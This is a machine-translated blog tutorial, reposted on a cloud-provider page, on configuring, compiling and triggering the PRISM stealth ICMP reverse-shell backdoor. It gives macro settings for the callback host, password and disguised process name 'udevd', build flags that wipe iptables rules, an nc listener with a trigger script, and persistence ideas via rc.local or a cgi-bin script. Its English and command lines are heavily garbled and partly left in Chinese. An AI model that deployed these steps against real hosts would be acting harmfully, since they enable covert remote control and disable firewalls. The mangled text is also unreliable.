ICMP bounce backdoor under Linux: PRISM

Source: Internet
Author: User

The ping-based ICMP backdoor that was inadvertently seen while searching. So to the author's GitHub to see, incredibly is engraved, in order to level, can only endure to see, the student dog hurt. Fortunately it's easier to understand, as the introduction says: "PRISM is a user space stealth reverse shell backdoor, written in pure C."

Project address:https://github.com/andreafabrizi/prism

Prism has only two main files, simple configuration, can be run on Linux,Solaris,AIX,bsd/mac,Android and many other systems, Two modes of operation are supported:ICMP and STATIC .




~$ Nc-l-P 9999


./sendpacket.py Linger 9999// remote host (target drone) IP address//linger connection password// Master IP address//9999 host computer connection port



Of course, as a mini-level backdoor Trojan. It also has a number of advantages:

No library support is required for two modes of operation, runtime process renaming, no listening for ports, automatic purge of iptables rule tables, C language (code with only 200来 lines).

Configuring the Prism Backdoor

Edit the Prism.c file and modify the macro definition section:

#ifdef STATIC $ # define Reverse_host     ""  //IP address connected to the Master machine # define Reverse_port     19832   // Port number to connect to the host computer # define Respawn_delay  //The idle time interval of the backdoor attempt to connect #else # define icmp_packet_size 1024x768  //icmp Packet The size of the # define Icmp_key         "linger"  //Connected password #endif #define VERSION          "0.5"   //version information #define MO TD             "PRISM V" VERSION "started\n\n#"  ///Backdoor connection when the message is displayed #define SHELL            "/bin/sh"  //shell executed position 52 # Define Process_name     "UDEVD"   //created process name

Cross-compiling Prism backdoor

GCC <. OPTIONS: >-wall-s-O prism prism.c

Available Parameters <OPTION> options:

-ddetach //Background run
-dstatic //Only in static mode (default is ICMP mode)
-dnorename //rename process name no longer
-diptables //Clear all Iptables rule table entries

For example:

Gcc-ddetach-dnorename-wall-s-O Prism prism.c

Cross-compilation under different platforms requires the relevant library files:

Android Platform:


Linux 64bit:

Apt-get Install Libc6-dev-amd64gcc-ddetach-m64-wall-s-O prism prism.c

Linux 32bit:

Apt-get Install Libc6-dev-i386gcc-ddetach-m32-wall-s-O prism prism.c

After compiling, you can view the configuration information of the backdoor:

Run the prism Backdoor test

Upload the backdoor to the remote backdoor host, and then use thesendPacket.py脚本(需以root运行)在本地发送激活包到后门主机,本地监听相关端口等待后门主机反弹连接:(这里要注意,最好时将prism.c文件上传到后门主机再进行编译,这样才更容易成功。)



  首先,上面说了,该后门重启会失效,除非写在开机启动项里。所以攻击者想要继续留住后门,肯定会这样做,故首先要检查开机启动项里(比如/etc/rc.local,这可是root权限!)是否有未知启动脚本。联想起前段时间的BASH漏洞,有一个不错的思路是在cgi-bin里的某个脚本里作改变,当访问这个脚本时就可以触发这个prism后门,这样就可以不用之前的python脚本来触发了。厄,貌似这就讲到攻击了-_- 不管怎样,先得有点见识靶。搞不好还真有人会这样用呢。




  但是,站在攻击者的角度来看,想要防范prism后门还是比较难的。正如其作者所描述的那样:“No listening ports”,啥意思?就是想用啥端口连接都可以,额测试过了: ) 这么说来,貌似上上一条有失效了-_-


ICMP bounce backdoor under Linux: PRISM

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.